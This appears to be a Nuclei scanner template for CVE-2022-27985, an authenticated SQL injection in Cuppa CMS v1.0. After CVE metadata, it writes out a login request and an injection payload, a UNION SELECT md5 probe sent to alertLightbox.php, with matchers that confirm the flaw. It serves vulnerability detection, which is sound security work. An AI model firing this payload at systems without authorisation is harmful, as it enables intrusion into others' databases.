65 lines
2.1 KiB
YAML
65 lines
2.1 KiB
YAML
id: CVE-2022-27985
|
|
|
|
info:
|
|
name: Cuppa CMS v1.0 - SQL injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
|
|
remediation: |
|
|
Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
|
|
reference:
|
|
- https://github.com/CuppaCMS/CuppaCMS
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-27985
|
|
- http://cuppa.com
|
|
- http://www.cuppacms.com/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-27985
|
|
cwe-id: CWE-89
|
|
epss-score: 0.03284
|
|
epss-percentile: 0.90318
|
|
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: cuppacms
|
|
product: cuppacms
|
|
tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms
|
|
variables:
|
|
num: '999999999'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
user={{username}}&password={{password}}&language=en&task=login
|
|
- |
|
|
POST /alerts/alertLightbox.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile¶ms%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-¶ms%5Breference%5D=41&uniqueClass=new_content_3983163
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{{md5(num)}}'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100e1689de7e100d1cf3cd6cb0088c58a5e7a55aa5e12d8d4a92eba0dbe6cf2c5fd02202c384a03f7128fe4d5c6ec0407b5df3cb36f265bfbb7c29ec092f1536f13177a:922c64590222798bb761d5b6d8e72950 |